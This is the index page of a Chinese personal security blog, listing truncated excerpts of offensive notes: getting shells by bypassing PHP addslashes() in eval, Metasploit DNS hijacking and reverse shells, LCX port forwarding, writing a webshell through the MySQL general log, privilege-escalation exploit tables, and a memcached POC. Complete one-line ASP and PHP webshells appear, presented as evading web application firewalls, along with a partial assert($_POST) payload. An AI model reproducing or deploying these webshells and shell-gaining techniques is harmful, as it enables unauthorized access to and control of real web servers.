DYBOY's Blog
网络安全
PHP复杂变量绕过addslashes()直接拿shell

很早的时候,渗透吧群里的朋友提出的一个问题,自己也是迷迷糊糊,遂记之如下!0x00示例ctf.php<?php@$_str=$_GET['str'];//print_r($_str);$_temp='$str="'.addslashes($_str).'";';@print_r($_temp);@eval('$st...

网络安全
[笔记]Metasploit内网/局域网劫持

Metasploit内网劫持的笔记内网渗透劫持DNS拿到cmdshell,如下步骤:ifconfig//获取IP及网卡信息leafpad/etc/ettercap/etter.dns//打开文件插入*A记录预设IPserviceapache2start//启动本机apache服务此次不用启动,使用ms10_046会自动启动//*A...

网络安全
[笔记]MetaSploit之弹个shell

在学习KaliLinux渗透时候记录的Metasploit使用笔记0x00简介Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。0x01reverse_tcp反弹shellsunnyclientid隧道id即可启动服务生成反弹shellmsfvenom...

网络安全
[内网渗透]LCX的蒂花之秀

LCX弹个shellLCX端口转发(突破内网不能连接)Webshell执行-slave<ConnectHost><ConnectPort><TransmitHost><TransPort>-slave外网IP外网IP监听端口127.0.0.1远程桌面端口外网(服务器)执行-listen...

网络安全
[笔记]PHP过狗一句话

四处搜刮,风雨飘摇<?php$a=$_GET['a'];$b=$_GET['b'];$c=base64_decode($a).base64_decode($b);$c=$_REQUEST['cmd'];?>

网络安全
[笔记]Mysql通过日志拿shell

Mysql通过日志拿shellemmm~有点舒服0x00利用条件root网站物理路径文件位置未被限制0x01SQL语句setglobalgeneral_log=on;setglobalgeneral_log_file='C:/phpStudy/WWW/dyboy.php';select'<?php@assert($_POST...

网络安全
[笔记]ASP过狗一句话

ASP过狗一句话<%dimx1,x2x1=request("pass")x2=x1evalx2%>

网络安全
[笔记]渗透测试提权EXP一览表

避免忘记,记录提权EXP对应表,便于快速提权0x00Windows#SecurityBulletin#KB#Description#OperatingSystemCVE-2017-0213 [WindowsCOMElevationofPrivilegeVulnerability]  (windows10/8.1/7/2016/2010/2...

网络安全
Memached代码执行漏洞复现视频+POC

通过POC的执行,使得memached服务停止运行,因为是任意代码执行,其他的,大家自己手动修改POC中的命令即可!0x00说明本次视频中的演示,依托于i春秋提供的实验镜像环境,感兴趣的朋友可以搜索一下。0x01过程dockerimages//列出镜像dockerrun-d-p11211:11211af1336632a51//启动容器docker...

网络安全
[代码审计]XYCMS留言板V1.7

代码审计方面小东还不算很深入,所以去站长之家找了一个低版本号的XYCMS留言板程序来审计一下,往往这种低版本的适合入门(适合我)0x00XYCMS留言板简介程序下载地址:http://down.chinaz.com/soft/37797.htm简介:XYCMS留言板是以php+MySQL进行开发的php留言板源码,软件为普通的留言板可广泛应用于企业网站等需要留言板的网站中进行使用。...

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap